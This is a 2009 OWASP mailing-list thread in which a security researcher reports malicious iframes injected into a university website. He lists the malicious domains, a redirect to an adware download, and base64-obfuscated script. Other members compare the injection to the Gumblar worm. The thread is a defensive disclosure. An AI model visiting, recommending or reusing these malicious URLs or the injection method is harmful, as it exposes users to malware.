[OWASP-Bangalore] OWASP-Bangalore Digest, Vol 23, Issue 2

Abhay Bhargav abhaybhargav at gmail.com
Wed Oct 7 23:04:00 EDT 2009


This is not very surprising. I have found several XSS vulnerabilities with
some very reputed universities and B-schools across the country (I shall not
name them). I have sent several mails to them and reported the issue, but it
is obviously not of high priority for them. I believe that, in some cases,
they dont know how to fix the problem also.

This phenomenon of embedded and obfuscated Javascript is common of the
Nine-ball and Gumblar worms. You might want to report this problem in such a
light.

Regards
Abhay

On Wed, Oct 7, 2009 at 9:44 PM, Sajin Jose <sajinkokkad at gmail.com> wrote:

> Unbelievable !! Just wondering why no one there at the university didn't
> notice this and rectify this..
> Also, I would really appreciate if some could one explain how the malicious
> site did this on a seemingly reputed university's site.. Any inputs?
>
> Rgds,
> Sajin.
>
> On Wed, Oct 7, 2009 at 9:30 PM, <owasp-bangalore-request at lists.owasp.org>wrote:
>
>> Send OWASP-Bangalore mailing list submissions to
>>        owasp-bangalore at lists.owasp.org
>>
>> To subscribe or unsubscribe via the World Wide Web, visit
>>        https://lists.owasp.org/mailman/listinfo/owasp-bangalore
>> or, via email, send a message with subject or body 'help' to
>>        owasp-bangalore-request at lists.owasp.org
>>
>> You can reach the person managing the list at
>>        owasp-bangalore-owner at lists.owasp.org
>>
>> When replying, please edit your Subject line so it is more specific
>> than "Re: Contents of OWASP-Bangalore digest..."
>>
>>
>> Today's Topics:
>>
>>   1. iframes injected into premiere educational        institutes site
>>      (praveen_recker .)
>>
>>
>> ----------------------------------------------------------------------
>>
>> Message: 1
>> Date: Tue, 6 Oct 2009 23:51:14 +0530
>> From: "praveen_recker ." <praveen_recker at sify.com>
>> Subject: [OWASP-Bangalore] iframes injected into premiere educational
>>        institutes site
>> To: owasp-bangalore at lists.owasp.org, owasp-delhi at lists.owasp.org
>> Message-ID:
>>        <3542efac0910061121p71a17debx4f530e8523dc1022 at mail.gmail.com>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi OWASP,
>>
>> I am writing this such that it can be informed to concerned authorities.
>> I tried to find mail id of the respective institue to inform them but
>> could'nt find any.
>>
>> Details are as follows....
>> Visit to anypage on* http://www.nagarjunauniversity.ac.in*
>> and right click to "View Source", we'll find the following site embedded
>> in
>> iframe *http://bale.ws/show.php*
>> When we open above site it gets redirected to *
>> http://superpupermegacasino.com/* which hosts *SmartDownload.exe*
>>
>> Details of the EXE at virustotal is shown as *Win32/CasOnline!Adware*
>>
>> http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534
>>
>>
>> the page has eval() and base64_decode() methods. When we decode the base64
>> content site *esli.tw* is embedded.
>>
>> There is one more site embedded *http://b.nt002.cn/E/J.JS*
>>
>> When we visit few pages on this site and if any AV is installed on ur
>> machine (McAfee AntiVirus is installed in my case and triggers PDF-Exploit
>> alert) it should trigger some alert.
>>
>> Interested folks can further analyze. Please inform concerned guys from
>> Nagarjuna University.
>>
>> Best Regards,
>> Praveen Darshanam,
>> Security Researcher
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>> URL:
>> https://lists.owasp.org/pipermail/owasp-bangalore/attachments/20091006/31f34ba0/attachment-0001.html
>>
>> ------------------------------
>>
>> _______________________________________________
>> OWASP-Bangalore mailing list
>> OWASP-Bangalore at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-bangalore
>>
>>
>> End of OWASP-Bangalore Digest, Vol 23, Issue 2
>> **********************************************
>>
>
>
> _______________________________________________
> OWASP-Bangalore mailing list
> OWASP-Bangalore at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-bangalore
>
>


-- 
Linkedin -  http://www.linkedin.com/in/abhaybhargav

My Security Blog - http://citadelnotes.blogspot.com

Blog feeds - http://feeds2.feedburner.com/AbhayBhargavOnInformationSecurity
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-bangalore/attachments/20091008/03848190/attachment-0001.html 


More information about the OWASP-Bangalore mailing list